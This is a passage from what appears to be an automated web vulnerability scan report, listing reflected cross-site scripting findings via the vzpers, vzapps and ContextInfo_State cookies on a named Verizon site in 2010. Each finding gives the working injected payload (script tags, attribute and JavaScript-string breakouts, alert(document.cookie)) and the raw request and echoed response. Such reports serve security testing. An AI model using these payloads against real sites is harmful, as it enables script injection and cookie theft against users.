The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 6641d<script>alert(1)</script>7c0eb744bf6 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/wifi HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX6641d<script>alert(1)</script>7c0eb744bf6; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72102
Expires: Mon, 13 Dec 2010 00:55:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:20 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6641D<SCRIPT>ALERT(1)</SCRIPT>7C0EB744BF6 </DIV>
...[SNIP]...

1.128. http://www22.verizon.com/ResidentialHelp/HomePage [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/HomePage

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 71a60<script>alert(1)</script>1e212a806e2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ResidentialHelp/HomePage HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX71a60<script>alert(1)</script>1e212a806e2; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 174687
Expires: Mon, 13 Dec 2010 01:02:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:02:20 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX71a60<script>alert(1)</script>1e212a806e2 </span>
...[SNIP]...

1.129. http://www22.verizon.com/ResidentialHelp/Templates/OverView.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ResidentialHelp/Templates/OverView.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3015d<script>alert(1)</script>ffb848e89e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ResidentialHelp/Templates/OverView.aspx?NRMODE=Published&NRNODEGUID=%7bCB971C1D-58DB-4072-97CC-3FEF3528A033%7d&NRORIGINALURL=%2fresidentialhelp%2f&NRCACHEHINT=Guest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX3015d<script>alert(1)</script>ffb848e89e; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 174652
Expires: Mon, 13 Dec 2010 01:02:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:02:49 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TX3015d<script>alert(1)</script>ffb848e89e </span>
...[SNIP]...

1.130. http://www22.verizon.com/content/LearnShop/Templates/Broadband/Broadband.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/LearnShop/Templates/Broadband/Broadband.aspx

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload eb2d5<script>alert(1)</script>093cf5a7e7c was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/LearnShop/Templates/Broadband/Broadband.aspx?NRMODE=Published&NRNODEGUID=%7b6D1C874F-8C8F-4D12-833A-F5C0A068D90E%7d&NRORIGINALURL=%2fResidential%2fInternet%2f&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXeb2d5<script>alert(1)</script>093cf5a7e7c; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67130
Expires: Mon, 13 Dec 2010 00:53:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:53:16 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:16 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:53:16 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><title>
Veri
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXEB2D5<SCRIPT>ALERT(1)</SCRIPT>093CF5A7E7C </DIV>
...[SNIP]...

1.131. http://www22.verizon.com/content/LearnShop/Templates/Broadband/Broadband.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/LearnShop/Templates/Broadband/Broadband.aspx

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ddcf'><script>alert(1)</script>3ff6e0f8613 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/LearnShop/Templates/Broadband/Broadband.aspx?NRMODE=Published&NRNODEGUID=%7b6D1C874F-8C8F-4D12-833A-F5C0A068D90E%7d&NRORIGINALURL=%2fResidential%2fInternet%2f&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX3ddcf'><script>alert(1)</script>3ff6e0f8613; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67134
Expires: Mon, 13 Dec 2010 00:52:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:52:56 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:52:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:52:56 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:52:56 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><title>
Veri
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX3DDCF'><SCRIPT>ALERT(1)</SCRIPT>3FF6E0F8613 ' />
...[SNIP]...

1.132. http://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/verizonglobalhome/gpromo.aspx

Issue detail

The value of the vzpers cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63c37'-alert(1)-'4ee76a138d6 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/verizonglobalhome/gpromo.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX63c37'-alert(1)-'4ee76a138d6; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 13383
Expires: Mon, 13 Dec 2010 00:40:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:01 GMT
Connection: close


<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>

                        <UL><LI><A class="marquee_selector
...[SNIP]...
<script>if(document.getElementById('yourlocation')) document.getElementById('yourlocation').innerHTML = 'TX63c37'-alert(1)-'4ee76a138d6 ';</script>
...[SNIP]...

1.133. http://www22.verizon.com/residential/bundles/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 2c15e<script>alert(1)</script>6cbf348ada9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX2c15e<script>alert(1)</script>6cbf348ada9; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 121015
Expires: Mon, 13 Dec 2010 00:59:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:59:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:59:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX2c15e<script>alert(1)</script>6cbf348ada9; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:46 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<span runat="server" id="spnvzapp">TX2C15E<SCRIPT>ALERT(1)</SCRIPT>6CBF348ADA9 . </span>
...[SNIP]...

1.134. http://www22.verizon.com/residential/bundles/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6da55'><script>alert(1)</script>6e06b952755 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX6da55'><script>alert(1)</script>6e06b952755; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115018
Expires: Mon, 13 Dec 2010 00:59:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:59:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:59:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:46 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:46 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6DA55'><SCRIPT>ALERT(1)</SCRIPT>6E06B952755 ' />
...[SNIP]...

1.135. http://www22.verizon.com/residential/bundles/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload df006<script>alert(1)</script>1560e46cc1d was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXdf006<script>alert(1)</script>1560e46cc1d; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115014
Expires: Mon, 13 Dec 2010 00:59:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:59:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:59:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:59:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDF006<SCRIPT>ALERT(1)</SCRIPT>1560E46CC1D </DIV>
...[SNIP]...

1.136. http://www22.verizon.com/residential/bundles/LaConexion [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/LaConexion

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 66f5d<script>alert(1)</script>371acd42338 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/LaConexion HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX66f5d<script>alert(1)</script>371acd42338; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 116096
Expires: Mon, 13 Dec 2010 00:57:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:57:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX66f5d<script>alert(1)</script>371acd42338; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:57:55 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<span runat="server" id="spnvzapp">TX66F5D<SCRIPT>ALERT(1)</SCRIPT>371ACD42338 . </span>
...[SNIP]...

1.137. http://www22.verizon.com/residential/bundles/LaConexion [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/LaConexion

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a9f58'><script>alert(1)</script>3592e809316 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/LaConexion HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
